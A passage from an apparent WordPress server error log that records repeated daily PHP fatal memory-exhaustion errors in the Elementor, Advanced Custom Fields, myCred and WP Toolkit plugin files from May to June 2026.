21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [26-May-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [27-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [27-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [27-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [27-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [28-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [28-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [28-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/ajax/module.php on line 113 [28-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [29-May-2026 21:40:23 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [29-May-2026 21:40:23 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [29-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/ajax/module.php on line 113 [29-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [30-May-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [30-May-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [30-May-2026 21:40:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [30-May-2026 21:40:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [31-May-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [31-May-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [31-May-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [31-May-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [01-Jun-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [01-Jun-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [01-Jun-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [01-Jun-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [02-Jun-2026 21:40:19 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [02-Jun-2026 21:40:19 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [02-Jun-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [02-Jun-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [03-Jun-2026 21:40:08 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 622 [03-Jun-2026 21:40:08 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [03-Jun-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [03-Jun-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [04-Jun-2026 21:40:07 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 622 [04-Jun-2026 21:40:07 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [04-Jun-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [04-Jun-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [05-Jun-2026 21:40:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [05-Jun-2026 21:40:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [05-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [05-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [06-Jun-2026 21:40:32 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 622 [06-Jun-2026 21:40:32 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [06-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [06-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [07-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [07-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [07-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 69 [07-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [08-Jun-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [08-Jun-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [08-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 67 [08-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [09-Jun-2026 21:40:36 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [09-Jun-2026 21:40:36 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [09-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 67 [09-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [10-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [10-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [10-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 67 [10-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [11-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [11-Jun-2026 21:40:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [11-Jun-2026 21:40:45 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 67 [11-Jun-2026 21:40:45 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [12-Jun-2026 21:40:47 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 515 [12-Jun-2026 21:40:47 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [12-Jun-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/badge-plus-object.php on line 120 [12-Jun-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [13-Jun-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [13-Jun-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [13-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [13-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [14-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [14-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [14-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [14-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [15-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [15-Jun-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [15-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [15-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [16-Jun-2026 21:40:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [16-Jun-2026 21:40:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [16-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [16-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [17-Jun-2026 21:40:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [17-Jun-2026 21:40:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [17-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [17-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [18-Jun-2026 21:40:36 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [18-Jun-2026 21:40:36 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [18-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [18-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [19-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [19-Jun-2026 21:40:37 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [19-Jun-2026 21:40:45 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [19-Jun-2026 21:40:45 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [20-Jun-2026 21:40:39 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [20-Jun-2026 21:40:39 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [20-Jun-2026 21:40:46 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [20-Jun-2026 21:40:46 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-Jun-2026 21:40:39 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [21-Jun-2026 21:40:39 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-Jun-2026 21:40:46 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [21-Jun-2026 21:40:46 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 544 [22-Jun-2026 21:40:40 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-Jun-2026 21:40:47 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [22-Jun-2026 21:40:47 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 